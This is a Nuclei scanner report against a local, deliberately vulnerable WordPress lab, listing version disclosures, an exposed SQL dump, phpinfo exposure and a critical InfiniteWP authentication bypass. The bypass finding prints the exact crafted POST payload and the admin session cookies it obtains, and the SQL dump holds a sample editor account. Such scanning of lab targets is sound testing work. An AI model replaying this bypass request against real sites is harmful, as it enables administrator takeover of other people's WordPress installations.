t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[apache-version-detect] [info] Apache Version found on http://127.0.0.1:31337
Details: apache-version-detect matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Wed Jul 7 00:11:19 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Apache Version |
author | philippedelteil |
description | Some Apache servers have the version on the response header. The OpenSSL version can be also obtained |
severity | info |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:19 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=KXdqrAcmCGywG76AaFd5Axbj32pp9TzL; expires=Fri, 09-Jul-2021 00:11:19 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Extra Information
Extracted results:
- Apache/2.4.38 (Debian)
Generated by Nuclei
[default-sql-dump] [medium] MySQL Dump Files found on http://127.0.0.1:31337
Details: default-sql-dump matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/dump.sql
Timestamp: Tue Jul 6 13:46:41 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | medium |
tags | exposure,backup |
name | MySQL Dump Files |
author | geeknik,dwisiswant0 |
Request
GET /dump.sql HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Range: bytes=0-3000
Response
HTTP/1.1 206 Partial Content
Connection: close
Content-Length: 1191
Accept-Ranges: bytes
Content-Range: bytes 0-1190/1191
Content-Type: application/x-sql
Date: Tue, 06 Jul 2021 13:46:41 GMT
Etag: "4a7-5c674a0fd15c0"
Last-Modified: Tue, 06 Jul 2021 13:45:03 GMT
Server: Apache/2.4.38 (Debian)
-- MySQL dump 10.13 Distrib 5.7.26, for Linux (x86_64)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.7.26-0ubuntu0.18.04.1
LOCK TABLES `wp_posts` WRITE;
UPDATE `wp_posts` SET `post_content` = '<!-- wp:paragraph -->\r\n<p>Welcome to Damn Vulnerable WordPress. This is your first post. Edit or delete it, then start writing!</p>\r\n<!-- /wp:paragraph -->', `post_title` = 'Hack Me If You Can', `post_name` = 'hack-me-if-you-can' WHERE `wp_posts`.`ID` = 1;
UNLOCK TABLES;
LOCK TABLES `wp_users` WRITE;
INSERT INTO `wordpress`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_registered`) VALUES ('2', 'editor', MD5('editor'), 'Editor', '[email protected]', '2020-01-01 00:00:00');
UNLOCK TABLES;
LOCK TABLES `wp_usermeta` WRITE;
INSERT INTO `wordpress`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '2', 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}');
UNLOCK TABLES;
LOCK TABLES `wp_usermeta` WRITE;
INSERT INTO `wordpress`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '2', 'wp_user_level', '7');
UNLOCK TABLES;
Generated by Nuclei
[wp-license-file] [info] WordPress license file disclosure found on http://127.0.0.1:31337
Details: wp-license-file matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/license.txt
Timestamp: Thu Jul 8 00:10:53 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | info |
tags | wordpress |
name | WordPress license file disclosure |
author | yashgoti |
Request
GET /license.txt HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 08 Jul 2021 00:10:53 GMT
Etag: "4ddf-57e6b80ad6140-gzip"
Last-Modified: Tue, 01 Jan 2019 20:37:49 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
WordPress - Web publishing software
Copyright 2011-2019 by the contributors
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
This program incorporates work covered by the following copyright and
permission notices:
b2 is (c) 2001, 2002 Michel Valdrighi - [email protected] -
http://tidakada.com
Wherever third party code has been used, credit has been given in the code's
comments.
b2 is released under the GPL
and
WordPress - Web publishing software
Copyright 2003-2010 by the contributors
WordPress is released under the GPL
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
langu.... Truncated ....
Generated by Nuclei
[wordpress-infinitewp-auth-bypass] [critical] WordPress InfiniteWP Client Authentication Bypass found on http://127.0.0.1:31337
Details: wordpress-infinitewp-auth-bypass matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/
Timestamp: Wed Jul 7 00:11:21 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress InfiniteWP Client Authentication Bypass |
author | princechaddha |
severity | critical |
tags | wordpress,auth-bypass,wp-plugin |
Request
POST / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Content-Length: 93
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
ContentLength: 3537
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:21 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=e2kT1t5Zsd35s2xRbDB9DcnzN91WnWw5; expires=Fri, 09-Jul-2021 00:11:21 GMT; Max-Age=172800; path=/
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625789481%7C8ZIaF5BJhiiinbBREMOiGgDrEDX2cSMY3VVxaxiPeX2%7C3ff6049c76686710b95aaec373588127576f191473a63a9ae75432ff99f700c4; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625789481%7C8ZIaF5BJhiiinbBREMOiGgDrEDX2cSMY3VVxaxiPeX2%7C3ff6049c76686710b95aaec373588127576f191473a63a9ae75432ff99f700c4; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625789481%7C8ZIaF5BJhiiinbBREMOiGgDrEDX2cSMY3VVxaxiPeX2%7C85846f1f9ea61fae6897ffddcf3621d8e5e89f009f5247e30034d36a16fe5ba5; path=/; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625789481%7CoVEe5v50wrDvT55DqmMKUgz4iv7jfycCK3cwa6it74E%7C43f14707f8eac4c191eec2488b32ce41bcc2e59157c65fde481270b753c92ad5; path=/wp-content/plugins; secure; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625789481%7CoVEe5v50wrDvT55DqmMKUgz4iv7jfycCK3cwa6it74E%7C43f14707f8eac4c191eec2488b32ce41bcc2e59157c65fde481270b753c92ad5; path=/wp-admin; secure; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625789481%7CoVEe5v50wrDvT55DqmMKUgz4iv7jfycCK3cwa6it74E%7C27741ce5651fb92a36eaafb6144283552fabab0d0a43fd49f197c79aaba459d8; path=/; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>
Reference:
Generated by Nuclei
[phpinfo-files] [low] phpinfo Disclosure found on http://127.0.0.1:31337
Details: phpinfo-files matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/info.php
Timestamp: Wed Jul 7 00:11:34 +0000 UTC 2021
Template Information
Key | Value |
---|---|
author | pdteam,daffainfo,meme-lord |
severity | low |
tags | config,exposure |
name | phpinfo Disclosure |
Request
GET /info.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:34 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
<table>
<tr class="h"><td>
<a href="http://www.php.net/"><img border="0" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHkAAABACAYAAAA+j9gsAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAD4BJREFUeNrsnXtwXFUdx8/dBGihmE21QCrQDY6oZZykon/gY5qizjgM2KQMfzFAOioOA5KEh+j4R9oZH7zT6MAMKrNphZFSQreKHRgZmspLHSCJ2Co6tBtJk7Zps7tJs5t95F5/33PvWU4293F29ybdlPzaM3df2XPv+Zzf4/zOuWc1tkjl+T0HQ3SQC6SBSlD6WKN4rusGm9F1ps/o5mPriOf8dd0YoNfi0nt4ntB1PT4zYwzQkf3kR9/sW4xtpS0CmE0SyPUFUJXFMIxZcM0jAZ4xrKMudQT7963HBF0n6EaUjkP0vI9K9OEHWqJLkNW1s8mC2WgVTwGAqWTafJzTWTKZmQuZ/k1MpAi2+eys6mpWfVaAPzcILu8EVKoCAaYFtPxrAXo8qyNwzZc7gSgzgN9Hx0Ecn3j8xr4lyHOhNrlpaJIgptM5DjCdzrJ0Jmce6bWFkOpqs0MErA4gXIBuAmY53gFmOPCcdaTXCbq+n16PPLXjewMfGcgEttECeouTpk5MplhyKsPBTiXNYyULtwIW7Cx1vlwuJyDLR9L0mQiVPb27fhA54yBbGttMpc1OWwF1cmKaH2FSF7vAjGezOZZJZ9j0dIZlMhnuRiToMO0c+N4X7oksasgEt9XS2KZCHzoem2Ixq5zpAuDTqTR14FMslZyepeEI4Ogj26n0vLj33uiigExgMWRpt+CGCsEePZqoePM738BPTaJzT7CpU0nu1yXpAXCC3VeRkCW4bfJYFZo6dmJyQTW2tvZc1nb719iyZWc5fmZ6Osu6H3uVzit52oBnMll2YizGxk8muFZLAshb/YKtzQdcaO3Y2CQ7eiy+YNGvLN+4+nJetm3bxhKJxJz316xZw1pbW9kLew+w1944XBEaPj6eYCeOx1gqNe07bK1MwIDbKcOFOR49GuePT5fcfOMX2drPXcQ0zf7y2tvbWVdXF/v1k2+yQ4dPVpQ5P0Um/NjoCX6UBMFZR6k+u7qMYVBYDIEqBW7eXAfPZX19zp2/oaGBHysNMGTFinPZik9fWggbI5Omb13zUDeB3lLsdwaK/YPeyAFU0i8Aw9/2Dwyx4SPjFQEYUlf3MTYw4Jx7CIVCbHR0oqIDNMD+FMG+ZE0dO/tsHlvAWnYS6H4qjfMC+Zld/wg92/tuv2WeeYT87j+H2aFDxysGLuSy+o/z49DQkONnmpqa2MjRyoYsZOXKGnb5Z+vZqlUrxUsAvI9At/oK+elnBpoNw+Dai9TekSMxDrgSh0KrSYshTprc2NhoRf1JtlikqirAVl98AddsSavDBDrsC+QdT7/TSoB344tzOZ39+70RbporVerqasyw1MEnC8iV6I9VTDi0uqbmfPFSq2W+gyUHXuEdb3WR5rab5jnD3i/BNMN8ChNaqsTiKa55KmBWX+Tuj0XQdQVF307nhTH0CPls+O0UPbaT5TQG/8qX68u6LpV67LQ6dNknaYgaYyPDx2TzvYGCsnhRkH8b/rsF2GDj1MCInkvxvRjOuCUlipWD/zrKx7ZOwBF0vfSSM2ShyaqAAOC1Nw+zt9/5YNbrN1zfwIdpfgnqebv/A6pnWAn4qlW1HPgHQ6OeoG3N9RO/+StMdDtmV2LxJPfBpQCGfwTgrVu38jFrKaW2tpZt2LCBdXR0sEgkwhv21u9cxQsyW3ZB1+DgoOM54btU6tu8eTPr6elhy5fr7IZNDey+e76e9/fCLcAllHpdKKinpaUlX8+111xB9VzNrYxqUAY/XVVVJYMOekLu2fFGM8VWYQRYiYkU9bD4vPlHFYnH4/zvkb1CgwACHgMoUpdyw3sFXcXUh4YHaNSHDqaxdL5jwVTXBpeXVY9oF3RcUQ+O09NT7Cayfld+4RJlP42gTIq8w66Qf/X4a6FTSSMMDcaE/NhYecMM+MdyG90OAhodWoAGkTUaSZByO5WdiA4GqwStrrM6k5vFKEXQserr63l7oR5V0NBojKctaSZtbneErOtGmFxwkGewjk0UzpCUlJSIRqMcjN8CkHLDqyRByq0PEGBBhDmdj7rQVujAaLfrrlk7xyW5gUaxpEtOmOQDr0e799NYmDVBi0+OT7FcbsaXxEQk8qprEBQMBm0vVKUBRcNjskFE8W71lSt79uzhda1d6w4ZGTUUp3NWAQ3TvW/fPvbVq+rZH/ceULOcF1/I06CY3QJohCCzNJnYdgEwwvpUKuNbUsLNpO3evZtfSGHp7+/nS2pw3LLFPVWLoA5yHQUtXvXFYjH+vU4F5yOibzsRUL38MTqC3XWh8GCWziMcDjt2BNEZUIfoUOpJkwvziT3S5ua8Jj/4yD5E0yERbPkhKv4RF4mhkN1wCMHN2rWfYZ2dnWz9+vXchNkJzBoaQ8Bxqg91wWo41YdO2dzczD+3bt06Rw0rBG4nOF8oi9M0Jsw9OgLqQ124BifLgeuHyVbN0NXUrODBmDWxgRR0pNrUYqMNgDOZGZbNzvgCuc4j0kX+GPJ2//CcMagQmKkbrm/knwVEp++SIXulM1+nhj9AY207QRDnpsnye24WA59DkuPlV/5j+z5eB2hE0W1tbTyQdNJmDpksRzFp2E9csFJAboRvDvz8gZdJgw2ek55KZphfAv+Inu8UdKnmkEUHQK93EjEZ4Rbkifq8JiactEpYAy9Nli2Gm6CjIZPn1qlKFWizleOG3BIwdKNZ+KRMxr9VHKvr1NKLXo2BhlAVFRPq1qlWW6MBr3NWyY2rTGXO5ySJlN9uDuiGsV7XTVPtl8CHYGizf/9+V5Om0hAwVV4ahuU8qia03HP26kyqFkMOTudDzjs/P/QKBUiBYa5ZNucfZJUkCG/0IhpCxYyqBF3lnLOII8q1GKqdStQ3rTh5MStwXX5O/nE1metGQzPHUH6JatA1OppQ8u1eUbpX44tO4GY5vM5Z9sduFgOfG1GwUOK6VFzaSAmrWCSfzGCuuT/O+bi6QwRdTtqXN2keJ4/ejgkJ5HedRARkbkGe6ARulgMWQ+Wc3cDAWohhoZdcue7ifJ7crfP6Me8dELd0Mv8U2begC2k9SHd3t+NnNm7cqKwRbiYUkykqvlZlmOYVLIq5bHRep46JzotOc9BhuFc0ZHGLph+CJIaXr1FZSIfxsdBiN1+LpALEK2By61Aqs0rwtV7DNBU3BMCYixYTLU6C8bM5hBwum0k1mesBpmPtlj+qXFenFsAgCVLon9DYeIxUnmh05HCdBIkCVRP6ussiepVZJZXIutCHwt2I0YGY2Kiz3AIyeG5aLNooVULQBbHy1/nAK2oEtEanheil+GO3aFg0FnwSilNC4q6OrXzywc0XCy1WMaFu/tgrCBLRuWpHuP+n1zqmRXFN0GAnwKgHeW1E1C/86UDJHFKptATZMPZTafbLXHtN3OPixKRC4ev4GwB2Gy6JxhQNEYul+KoKp79RMaGqKzy9ovzt27c7pidVZtYAGJMYOP7u6bdK1mLI1GQ+/ogSZBahwKuLO2jSZt0odw65xrUhAMNrZskLsGiIXz72F3bTjV+ixvtbWcMQr3NW.... Truncated ....
Extra Information
Extracted results:
- 7.1.33
Generated by Nuclei
[wordpress-infinitewp-auth-bypass] [critical] WordPress InfiniteWP Client Authentication Bypass found on http://127.0.0.1:31337
Details: wordpress-infinitewp-auth-bypass matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/
Timestamp: Thu Jul 8 00:10:45 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | wordpress,auth-bypass,wp-plugin |
name | WordPress InfiniteWP Client Authentication Bypass |
author | princechaddha |
severity | critical |
Request
POST / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Content-Length: 93
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
ContentLength: 3537
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:45 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=KKNDkapbmmcqFDXeQBScq6PWMkzMZeSK; expires=Sat, 10-Jul-2021 00:10:45 GMT; Max-Age=172800; path=/
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CgrZ9GgvNeTl7Ui1ff10dQ36G4M7Oyn477fLAeFBRGd3%7C853cb1e9007bf5af25fc8a1693e330be377c11a49c0ff4b4bbe813bc1b8468c2; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CgrZ9GgvNeTl7Ui1ff10dQ36G4M7Oyn477fLAeFBRGd3%7C853cb1e9007bf5af25fc8a1693e330be377c11a49c0ff4b4bbe813bc1b8468c2; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CgrZ9GgvNeTl7Ui1ff10dQ36G4M7Oyn477fLAeFBRGd3%7C79ecf25a6d26252b2aaf0bcac09ea70d532a4297a0ccbaa42bd108e609b63a22; path=/; HttpOnly
